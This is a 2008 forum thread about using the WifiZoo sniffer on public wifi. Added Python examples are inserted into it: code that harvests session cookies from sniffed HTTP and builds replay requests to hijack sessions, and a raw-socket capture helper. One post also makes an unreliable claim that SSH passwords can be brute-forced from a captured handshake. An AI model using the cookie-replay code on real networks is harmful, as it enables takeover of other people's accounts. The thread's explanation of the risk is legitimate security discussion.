Boat Drinks  

Old 21-03-2008, 17:35   #1
Dr. Z
I'm going for a scuttle...
Join Date: Jul 2006
Posts: 2,021
Be careful what you broadcast...

...if you are using a wifi connection in a public place (or anywhere, really)

I have been trying out this tool called WifiZoo which is like a kind of Wireshark for wireless but with a bit of a cool twist. Instead of showing you a long list of packets which you would have to walk through to get a handle on what is going on, this tracks connections and basically presents you with a categorical breakdown of useful stuff.

For example, you sit down in your hotel lobby and use their wireless LAN to check your GMail account. GMail tracks who you are and your authenticated status using cookies. You log in over SSL, so there is no chance of a MITM seeing your password, but Google then issues you a cookie which says "yes, I am logged in" and which has a limited expiration time. The rest of your session is then in plaintext, but without the cookie you can't get into the GMail site... WifiZoo tracks HTTP sessions and grabs any cookies set. With a click of the mouse, it injects that cookie into its own built-in proxy server and presents me with the page that only you should be able to see. Clever, huh?

It's not limited to cookies and stuff though, oh no! It can track POP3 auth details, MSN conversations, FTP data, SMTP data, and that's just out of the box - if you know Python you could code it to track whatever you wanted.

When combined with a tool called Kismet it will channel-hop too, so you can track multiple APs at once to see which is the "best" one to pay more attention to, or in multi-AP configurations you can keep track of multiple users who might not be on the same AP.

Here is a screenshot:

http://www.statichiss.co.uk/wifizoo.png
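The cookie grab described in the post, as an added example in plain Python (this is not WifiZoo's code, and nothing here touches the network). It parses raw HTTP requests the way they appear in plaintext on an open WLAN, indexes every Cookie header by client address and host, and then rebuilds the request a cookie-injecting proxy would send to ride that session. The sample packets, addresses and host names are constructed for the example. The last function is the check on the defending side: a Set-Cookie without the Secure attribute is exactly the cookie a browser will leak over plaintext HTTP.

```python
"""Sniffed-cookie session replay (added example, not WifiZoo's own code)."""
from collections import defaultdict
from http.cookies import SimpleCookie

# Constructed sample traffic: (client_ip, raw HTTP request as seen on the wire).
SAMPLE_PACKETS = [
    ("10.0.0.5", b"GET /mail/ HTTP/1.1\r\nHost: mail.example.com\r\n"
                 b"Cookie: SID=abc123; HSID=xyz789\r\n\r\n"),
    ("10.0.0.5", b"GET /static/logo.png HTTP/1.1\r\nHost: mail.example.com\r\n\r\n"),
    ("10.0.0.7", b"POST /login HTTP/1.1\r\nHost: shop.example.org\r\n"
                 b"Content-Length: 0\r\nCookie: session=deadbeef\r\n\r\n"),
    ("10.0.0.7", b"GARBAGE\r\n"),  # not HTTP; must be skipped, not crash the sniffer
]


def parse_request(raw):
    """Parse the request line and headers of a raw HTTP/1.x request.
    Returns (method, path, headers) with lower-cased header names,
    or None if the bytes are not an HTTP request."""
    try:
        head, _, _body = raw.partition(b"\r\n\r\n")
        lines = head.decode("latin-1").split("\r\n")
        method, path, version = lines[0].split(" ", 2)
        if not version.startswith("HTTP/"):
            return None
    except (ValueError, IndexError):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if name and sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def harvest_cookies(packets):
    """Index every cookie seen, keyed by (client_ip, host), as a passive
    sniffer would. Later requests from the same client to the same host
    merge into the same jar."""
    jar = defaultdict(dict)
    for client, raw in packets:
        parsed = parse_request(raw)
        if parsed is None:
            continue
        _method, _path, headers = parsed
        host = headers.get("host")
        if host and "cookie" in headers:
            cookie = SimpleCookie()
            cookie.load(headers["cookie"])
            jar[(client, host)].update({k: m.value for k, m in cookie.items()})
    return dict(jar)


def replay_request(jar, client, host, path="/"):
    """Build the request a cookie-injecting proxy would send to `host`,
    presenting the cookies captured from `client`. Returns bytes, or None
    if nothing was captured for that client/host pair."""
    cookies = jar.get((client, host))
    if not cookies:
        return None
    cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_header}\r\nConnection: close\r\n\r\n").encode()


def missing_secure_flag(set_cookie_value):
    """Defender's check: True if a Set-Cookie header lacks the Secure
    attribute, meaning the browser will send it over plaintext HTTP too."""
    attrs = [a.strip().lower() for a in set_cookie_value.split(";")[1:]]
    return "secure" not in attrs


if __name__ == "__main__":
    jar = harvest_cookies(SAMPLE_PACKETS)
    for (client, host), cookies in jar.items():
        print(f"{client} -> {host}: {cookies}")
    print(replay_request(jar, "10.0.0.5", "mail.example.com", "/mail/").decode())
    print("leaks over HTTP:", missing_secure_flag("SID=abc123; Path=/; HttpOnly"))
```

The replayed request carries no password and no TLS handshake; the server sees a cookie it issued and serves the page, which is why the login page being HTTPS does not help once the session cookie travels over plaintext. The fix on the site side is the Secure (and ideally HttpOnly) attribute plus serving the whole session over HTTPS.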
Old 22-03-2008, 01:29   #2
Feek
ex SAS
Join Date: Jun 2006
Location: JO01ou
Posts: 10,062

Ouch!
Old 22-03-2008, 08:58   #3
Garp
Preparing more tumbleweed
Join Date: Jun 2006
Location: Hawaii
Posts: 6,038

SSH tunnel from my N810 through to my server, then using mail clients like mutt on it, keeps my sensitive data encrypted all the time... thankfully

You got me curious though... *goes off in hunt of software*
Old 22-03-2008, 10:45   #4
Desmo
The Last Airbender
Join Date: Jun 2006
Location: Pigmopad
Posts: 11,915

I had a little play with BacktrackII a little while ago but didn't have a clue what was going on
Old 22-03-2008, 11:10   #5
Will
BBx woz 'ere :P
Join Date: Jan 1970
Posts: 2,147,487,208

Quote:
Originally Posted by Desmo View Post
I had a little play with BacktrackII a little while ago but didn't have a clue what was going on
Yeah - I've installed all sorts of apps on my linux laptop - do I know what's going on? Do I ****!
__________________
No No!
Old 22-03-2008, 15:40   #6
Desmo
The Last Airbender
Join Date: Jun 2006
Location: Pigmopad
Posts: 11,915

I'm just downloading Ubuntu so I can cock things up some more
Old 22-03-2008, 19:02   #7
Desmo
The Last Airbender
Join Date: Jun 2006
Location: Pigmopad
Posts: 11,915

Was going to have a play with WifiZoo but can't seem to get it working :/
I'm a *nix noob!
Old 22-03-2008, 19:07   #8
Desmo
The Last Airbender
Join Date: Jun 2006
Location: Pigmopad
Posts: 11,915

Think I'm doing this right....

Code:
james@james-laptop:~$ python /home/james/wifizoo/wifizoo.py -i eth1
WifiZoo v1.3, complains to Hernan Ochoa (hernan@gmail.com)
using interface eth1
Launching Web Interface..
WifiZoo Web GUI Serving HTTP on 127.0.0.1 port 8000 ...
WifiZoo HTTP Proxy on 127.0.0.1 port 8080 ...
Waiting...
Traceback (most recent call last):
  File "/home/james/wifizoo/wifizoo.py", line 121, in <module>
    p = sniff(filter=None, iface=conf.iface, count=1)
  File "/home/james/wifizoo/scapy.py", line 11815, in sniff
    s = L2socket(type=ETH_P_ALL, *arg, **karg)
  File "/home/james/wifizoo/scapy.py", line 10133, in __init__
    self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
  File "/usr/lib/python2.5/socket.py", line 154, in __init__
    _sock = _realsocket(family, type, proto)
socket.error: (1, 'Operation not permitted')
...but I'm getting this socket error at the end.
Old 22-03-2008, 22:29   #9
Dr. Z
I'm going for a scuttle...
Join Date: Jul 2006
Posts: 2,021

What card do you have? You also need to be running Kismet in the background at the same time, as well as being root (tack a sudo onto the front of both this and Kismet - Kismet automatically priv-drops anyway, but as WifiZoo is only passive you shouldn't be too much at risk).

Quote:
Originally Posted by garp
SSH tunnel from my N810 through to my server, then using mail clients like mutt on it, keeps my sensitive data encrypted all the time... thankfully

You got me curious though... *goes off in hunt of software*
But if I can see all your packets, what's to stop me MITMing you? (RSA fingerprints aside)

In any case, SSH is still vulnerable to offline brute-force attacks, so I could theoretically obtain your username and password if I caught your handshake.
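The `socket.error: (1, 'Operation not permitted')` in post #8 is what happens when scapy's `sniff()` opens an `AF_PACKET`/`SOCK_RAW` socket without `CAP_NET_RAW`, and the reply above is right that the quick fix is `sudo`. The added example below (mine, not WifiZoo's or Kismet's code) reproduces that open, turns the errno into an actionable message, and shows the priv-drop pattern the reply credits Kismet with: open the privileged socket first, then give up root before touching any captured bytes. The interface name, the unprivileged user and the `setcap` path in the message are assumptions; the block is Linux-only and does not drop privileges unless it is actually running as root.

```python
"""Raw capture socket: diagnose EPERM, then drop root once the socket is open.
Added example, not WifiZoo's or Kismet's code. Linux only (AF_PACKET)."""
import os
import pwd
import socket

ETH_P_ALL = 0x0003  # capture every ethertype, as scapy's sniff() does


def open_capture_socket(iface=None):
    """Try to open the same kind of raw socket scapy uses.
    Returns (sock, None) on success or (None, "<kind>: <diagnosis>") on failure.
    Kinds: need_privileges, unsupported, error."""
    if not hasattr(socket, "AF_PACKET"):
        return None, "unsupported: AF_PACKET raw sockets are Linux-only"
    try:
        s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
        if iface:
            s.bind((iface, 0))  # restrict capture to one interface
    except PermissionError as e:
        # Python 3 spelling of the post's socket.error (1, 'Operation not permitted').
        # Assumed remedy path: grant the capability to a dedicated interpreter copy
        # rather than the system python, e.g.
        #   setcap cap_net_raw,cap_net_admin+eip /opt/sniff/bin/python3
        return None, (f"need_privileges: {e.strerror} (errno {e.errno}); "
                      "run under sudo or grant CAP_NET_RAW to the interpreter")
    except OSError as e:
        return None, f"error: {e.strerror} (errno {e.errno})"
    return s, None


def drop_privileges(user="nobody"):
    """Give up root after the privileged socket exists. Order matters:
    supplementary groups, then gid, then uid, since once the uid is
    unprivileged the earlier two calls would be refused.
    Returns True if privileges were dropped, False if there was nothing to drop."""
    if os.geteuid() != 0:
        return False
    pw = pwd.getpwnam(user)  # 'nobody' is an assumed unprivileged account
    os.setgroups([])
    os.setgid(pw.pw_gid)
    os.setuid(pw.pw_uid)
    os.umask(0o077)
    if os.getuid() != pw.pw_uid or os.geteuid() != pw.pw_uid:
        raise RuntimeError("privilege drop did not take effect")
    return True


if __name__ == "__main__":
    sock, diagnosis = open_capture_socket("eth1")  # interface name assumed
    if diagnosis:
        raise SystemExit(diagnosis)
    dropped = drop_privileges()
    print("capturing as uid", os.getuid(), "(dropped root)" if dropped else "")
    # Parsing of untrusted frames happens here, after the drop, so a bug in the
    # dissector runs as 'nobody' rather than as root.
    print(sock.recv(65535)[:64].hex())
```

Run it as an ordinary user and it exits with the `need_privileges` line instead of a traceback; run it under `sudo` and the socket is opened by root but every byte of wireless traffic is parsed by `nobody`. That is the reason a passive sniffer that priv-drops is a smaller risk than one that stays root: the packets it reads come from everyone on the WLAN, including anyone targeting the sniffer itself.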
Old 23-03-2008, 11:21   #10
Garp
Preparing more tumbleweed
Join Date: Jun 2006
Location: Hawaii
Posts: 6,038

Quote:
Originally Posted by DRZ View Post
What card do you have? You also need to be running Kismet in the background at the same time, as well as being root (tack a sudo onto the front of both this and Kismet - Kismet automatically priv-drops anyway, but as WifiZoo is only passive you shouldn't be too much at risk).

But if I can see all your packets, what's to stop me MITMing you? (RSA fingerprints aside)

In any case, SSH is still vulnerable to offline brute-force attacks, so I could theoretically obtain your username and password if I caught your handshake.
Good luck trying to get them from a passphrase-protected SSH key. Still, MITM could be used to disrupt things a bit. Last year's hacker conference had some bloke who used MITM-style hacks with Snort to replace all images on pages people were viewing with goatse.
__________________
Mal: Define "interesting"?
Wash: "Oh, God, oh, God, we're all gonna die"?